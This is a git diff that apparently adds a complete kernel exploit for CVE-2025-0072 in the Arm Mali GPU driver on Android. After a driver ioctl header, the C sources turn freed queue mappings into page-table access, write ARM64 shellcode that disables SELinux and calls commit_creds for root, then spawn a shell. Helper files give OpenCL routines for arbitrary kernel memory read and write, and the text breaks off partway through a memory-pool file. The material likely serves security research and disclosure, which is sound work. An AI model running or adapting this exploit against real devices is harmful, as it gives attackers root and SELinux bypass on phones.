KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + +/** + * struct kbase_ioctl_kinstr_prfcnt_enum_info - Enum Performance counter + * information + * @info_item_size: Performance counter item size in bytes. + * @info_item_count: Performance counter item count in the info_list_ptr. + * @info_list_ptr: Performance counter item list pointer which points to a + * list with info_item_count of items. + * + * On success: returns info_item_size and info_item_count if info_list_ptr is + * NULL, returns performance counter information if info_list_ptr is not NULL. + * On error: returns a negative error code. + */ +struct kbase_ioctl_kinstr_prfcnt_enum_info { + __u32 info_item_size; + __u32 info_item_count; + __u64 info_list_ptr; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO \ + _IOWR(KBASE_IOCTL_TYPE, 56, struct kbase_ioctl_kinstr_prfcnt_enum_info) + +/** + * struct kbase_ioctl_kinstr_prfcnt_setup - Setup HWC dumper/reader + * @in: input parameters. + * @in.request_item_count: Number of requests in the requests array. + * @in.request_item_size: Size in bytes of each request in the requests array. + * @in.requests_ptr: Pointer to the requests array. + * @out: output parameters. + * @out.prfcnt_metadata_item_size: Size of each item in the metadata array for + * each sample. + * @out.prfcnt_mmap_size_bytes: Size in bytes that user-space should mmap + * for reading performance counter samples. + * + * A fd is returned from the ioctl if successful, or a negative value on error. + */ +union kbase_ioctl_kinstr_prfcnt_setup { + struct { + __u32 request_item_count; + __u32 request_item_size; + __u64 requests_ptr; + } in; + struct { + __u32 prfcnt_metadata_item_size; + __u32 prfcnt_mmap_size_bytes; + } out; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_SETUP \ + _IOWR(KBASE_IOCTL_TYPE, 57, union kbase_ioctl_kinstr_prfcnt_setup) + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/** + * struct kbase_ioctl_buffer_liveness_update - Update the live ranges of buffers from previous frame + * + * @live_ranges_address: Array of live ranges + * @live_ranges_count: Number of elements in the live ranges buffer + * @buffer_va_address: Array of buffer base virtual addresses + * @buffer_sizes_address: Array of buffer sizes + * @buffer_count: Number of buffers + * @padding: Unused + */ +struct kbase_ioctl_buffer_liveness_update { + __u64 live_ranges_address; + __u64 live_ranges_count; + __u64 buffer_va_address; + __u64 buffer_sizes_address; + __u64 buffer_count; +}; + +#define KBASE_IOCTL_BUFFER_LIVENESS_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 67, struct kbase_ioctl_buffer_liveness_update) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 +#ifdef __cpluscplus +} +#endif + +#endif /* _UAPI_KBASE_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_userio.c b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_userio.c new file mode 100644 index 0000000..a012a31 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_userio.c @@ -0,0 +1,223 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +//From https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17 +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define MALI "/dev/mali0" + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2411; + +static uint64_t avc_deny = AVC_DENY_2411; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +int find_mali_fd() { + int test_fd = open("/dev/null", O_RDWR); + char file_path[256]; + char proc_string[256]; + for (int i = 3; i < test_fd; i++) { + sprintf(proc_string, "/proc/self/fd/%d", i); + if(readlink(proc_string, file_path, 256) > 0) { + if (strncmp(file_path, MALI, 10) == 0) { + close(test_fd); + return i; + } + } + } + close(test_fd); + return -1; +} + +int find_pgd(uint64_t* userio_addr) { + for (int i = 0; i < 0x2000/8; i++) { + uint64_t entry = *(userio_addr + i + 0x1000/8); + if ((entry & 0x443) == 0x443) { + LOG("found entry %lx at %d in page %d\n", entry, i%(0x1000/8), i/(0x1000/8)); + return i/(0x1000/8); + } + } + return -1; +} + +void queue_register(int fd, uint64_t queue_addr, uint32_t queue_pages) { + struct kbase_ioctl_cs_queue_register reg = {0}; + reg.buffer_gpu_addr = queue_addr; + reg.buffer_size = queue_pages; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, ®) < 0) { + err(1, "register queue failed\n"); + } +} + +uint64_t queue_bind(int fd, uint64_t queue_addr, uint8_t group_handle, uint8_t csi_index) { + union kbase_ioctl_cs_queue_bind bind = {0}; + bind.in.buffer_gpu_addr = queue_addr; + bind.in.group_handle = group_handle; + bind.in.csi_index = csi_index; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_BIND, &bind) < 0) { + err(1, "bind queue failed\n"); + } + return bind.out.mmap_handle; +} + +uint8_t kcpu_queue_new(int fd) { + struct kbase_ioctl_kcpu_queue_new queue_new = {0}; + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_CREATE, &queue_new) < 0) { + err(1, "kcpu queue create failed\n"); + } + return queue_new.id; +} + +void write_shellcode(int mali_fd, uint64_t pgd, uint64_t* reserved, cl_command_queue command_queue, struct rw_mem_kernel* kernel, struct rw_mem_kernel* kernel32) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + uint64_t* overwrite_index = (uint64_t*)(pgd + OVERWRITE_INDEX * sizeof(uint64_t)); + *overwrite_index = avc_deny_addr; + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + *overwrite_index = sel_read_enforce_addr; + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + fixup_root_shell(INIT_CRED_2411, COMMIT_CREDS_2411, SEL_READ_ENFORCE_2411, ADD_INIT_2411, ADD_COMMIT_2411, &(root_code[0])); + + cl_platform_id platform_id = NULL; + cl_device_id device_id = NULL; + cl_uint ret_num_devices; + cl_uint ret_num_platforms; + + cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms); + if (ret != CL_SUCCESS) { + err(1, "fail to get platform\n"); + } + + ret = clGetDeviceIDs( platform_id, CL_DEVICE_TYPE_DEFAULT, 1, + &device_id, &ret_num_devices); + if (ret != CL_SUCCESS) { + err(1, "fail to get Device ID\n"); + } + + cl_context context = clCreateContext( NULL, 1, &device_id, NULL, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create context\n"); + } + + cl_command_queue command_queue = clCreateCommandQueueWithProperties(context, device_id, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create command_queue\n"); + } + + int mali_fd = find_mali_fd(); + + void* gpu_addr = map_gpu(mali_fd, 1, 1, false, 0); + LOG("gpu_addr %lx\n", (uint64_t)gpu_addr); + queue_register(mali_fd, (uint64_t)gpu_addr, 0x1000); + union kbase_ioctl_cs_queue_group_create gc = {0}; + if (ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_CREATE, &gc) < 0) { + err(1, "Failed to create group\n"); + } + uint8_t group_handle = gc.out.group_handle; + uint64_t cookie = queue_bind(mali_fd, (uint64_t)gpu_addr, group_handle, 0); + LOG("group_handle %d cookie %lx\n", group_handle, cookie); + uint64_t* queue_userio = (uint64_t*)mmap(NULL, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookie); + if (queue_userio == MAP_FAILED) { + err(1, "mmap failed\n"); + } + struct kbase_ioctl_cs_queue_group_term gt = {0}; + gt.group_handle = group_handle; + if (ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE, >) < 0) { + err(1, "Failed to terminate group\n"); + } + union kbase_ioctl_cs_queue_group_create gc2 = {0}; + if (ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_CREATE, &gc2) < 0) { + err(1, "Failed to create group\n"); + } + group_handle = gc2.out.group_handle; + cookie = queue_bind(mali_fd, (uint64_t)gpu_addr, group_handle, 0); + LOG("group_handle %d cookie %lx\n", group_handle, cookie); + uint64_t* queue_userio2 = (uint64_t*)mmap(NULL, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookie); + if (queue_userio2 == MAP_FAILED) { + err(1, "mmap2 failed\n"); + } + + uint64_t y0 = *(queue_userio2 + 0x1000/8); + + + reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + munmap(queue_userio, 0x3000); + map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int idx = find_pgd(queue_userio2); + if (idx == -1) { + err(1, "Cannot find page table entry\n"); + } + + struct rw_mem_kernel kernel = create_rw_mem(context, &device_id, true); + struct rw_mem_kernel kernel32 = create_rw_mem(context, &device_id, false); + uint64_t write_addr = 0x1000 + (uint64_t)queue_userio2 + 0x1000; + write_shellcode(mali_fd, write_addr, &(reserved[0]), command_queue, &kernel, &kernel32); + LOG("run enforce\n"); + run_enforce(); + LOG("clean up\n"); + uint64_t* cleanup_addr = (uint64_t*)(write_addr + OVERWRITE_INDEX * sizeof(uint64_t)); + uint64_t invalid = 2; + *cleanup_addr = invalid; + ret = clFinish(command_queue); + releaseKernel(&kernel); + releaseKernel(&kernel32); + ret = clReleaseCommandQueue(command_queue); + ret = clReleaseContext(context); + system("sh"); + } diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.c b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.c new file mode 100644 index 0000000..34b430a --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.c @@ -0,0 +1,264 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" + +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +static inline uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +static inline uint32_t hi32(uint64_t x) { + return x >> 32; +} + +static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +static uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64) { + int ret = 0; + + const char* source_str64 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned long *addr = (__global unsigned long*)(va[idx]);" + " addr[0] = in_out[idx];" + "} else {" + " __global unsigned long *addr = (__global unsigned long *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str32 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned int *addr = (__global unsigned int*)(va[idx]);" + " addr[0] = (unsigned int)(in_out[idx]);" + "} else {" + " __global unsigned int *addr = (__global unsigned int *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str = is64 ? source_str64 : source_str32; + + size_t source_size = strlen(source_str); + + cl_mem va = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create va buffer\n"); + } + cl_mem in_out = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create in_out buffer\n"); + } + cl_mem flag = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create flag buffer\n"); + } + + cl_program program = clCreateProgramWithSource(context, 1, (const char**)(&source_str), (const size_t*)(&source_size), &ret); + ret = clBuildProgram(program, 1, device_id, NULL, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to create program\n"); + } + + cl_kernel kernel = clCreateKernel(program, "rw_mem", &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create kernel %d\n", ret); + } + ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&va); + ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&in_out); + ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&flag); + if (ret != CL_SUCCESS) { + err(1, "Failed to set kernel arg\n"); + } + struct rw_mem_kernel out = {0}; + out.va = va; + out.in_out = in_out; + out.flag = flag; + out.kernel = kernel; + out.program = program; + return out; +} + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t write = 1; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); +} + + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + reserved_size * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr && overwrite_addr >= base && overwrite_addr < end) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + uint64_t this_addr = overwrite_addr + func_offset + code * 4; + uint64_t this_code = shellcode[code]; + write_to(mali_fd, &this_addr, &this_code, command_queue, kernel32); + } + usleep(300000); + } + } + } +} + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t read = 0; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &read, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + uint64_t out = 0; + if (clEnqueueReadBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), &out, 0, NULL, NULL) != CL_SUCCESS) { + err(1, "Failed to read result\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); + return out; +} + +void releaseKernel(struct rw_mem_kernel* kernel) { + clReleaseKernel(kernel->kernel); + clReleaseProgram(kernel->program); + clReleaseMemObject(kernel->va); + clReleaseMemObject(kernel->in_out); + clReleaseMemObject(kernel->flag); + memset(kernel, 0, sizeof(struct rw_mem_kernel)); +} + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t addr = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + uint64_t invalid = 2; + write_to(mali_fd, &addr, &invalid, command_queue, kernel); +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h new file mode 100644 index 0000000..1906051 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h @@ -0,0 +1,41 @@ +#ifndef MEM_READ_WRITE_H +#define MEM_READ_WRITE_H + +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" + +#define KERNEL_BASE 0x80000000 + +#define PAGE_SHIFT 12 + +#define OVERWRITE_INDEX 256 + +struct rw_mem_kernel { + cl_mem va; + cl_mem in_out; + cl_mem flag; + cl_kernel kernel; + cl_program program; +}; + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group); + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code); + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32); + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64); + +void releaseKernel(struct rw_mem_kernel* kernel); + +int run_enforce(); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.c b/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.c new file mode 100644 index 0000000..c96b25c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.c @@ -0,0 +1,60 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include + +#include "mempool_utils.h" + +#define POOL_SIZE 16384 + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void reserve_pages(int 